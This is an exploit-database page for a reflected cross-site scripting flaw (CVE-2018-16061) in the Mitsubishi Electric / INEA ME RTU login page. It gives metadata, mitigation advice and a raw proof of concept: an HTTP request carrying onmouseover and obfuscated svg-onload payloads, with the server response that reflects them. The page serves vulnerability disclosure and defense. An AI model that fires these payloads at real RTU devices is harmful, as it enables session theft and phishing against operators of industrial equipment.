header-logo
Suggest Exploit
vendor:
INEA SmartRTU
by:
Hamit CIBO
6.1
CVSS
MEDIUM
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: INEA SmartRTU
Affected Version From: ME RTU
Affected Version To: ME RTU
Patch Exists: YES
Related CWE: CVE-2018-16061
CPE: a:mitsubishi_electric:me_rtu
Metasploit:
Other Scripts:
Platforms Tested: Windows
2021

Mitsubishi Electric & INEA SmartRTU – Reflected Cross-Site Scripting (XSS)

This exploit allows an attacker to execute arbitrary JavaScript code in the context of a victim's browser. By injecting malicious code into a web page, the attacker can steal sensitive information, perform phishing attacks, or gain unauthorized access to user accounts.

Mitigation:

To mitigate this vulnerability, input validation and output encoding should be implemented on the affected application to prevent the execution of arbitrary JavaScript code. Additionally, web application firewalls (WAFs) can be used to filter and block malicious input.
Source

Exploit-DB raw data:

# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
# Date: 2021-17-10
# Exploit Author: Hamit CİBO
# Vendor Homepage: https://www.inea.si
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
# Version: ME RTU
# Tested on: Windows
# CVE : CVE-2018-16061


# PoC
# Request

POST
/login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%
3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1
Host: **.**.**.***
Content-Length: 132
Cache-Control: max-age=0
Origin: http://**.**.**.***
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/68.0.3440.84
Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://**.**.**.***sss/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7
Connection: close

submitted=1&username=--
%3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&passw
ord=&Submit=Login

# Response

HTTP/1.1 200 OK
Date: Wed, 08 Aug 2018 08:14:25 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4
Vary: Accept-Encoding
Content-Length: 3573
Connection: close
Content-Type: text/html

<div id='fg_membersite' class='login_form'>
<form id='login' name='login'
action='/login.php/srdzz'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'bsmy8'
method='post' accept-charset='UTF-8'>


Reference :

https://drive.google.com/file/d/1DEZQqfpIgcflY2cF6O0y7vtlWYe8Wjjv/view

Navigation

Suggest Exploit

Services By CQR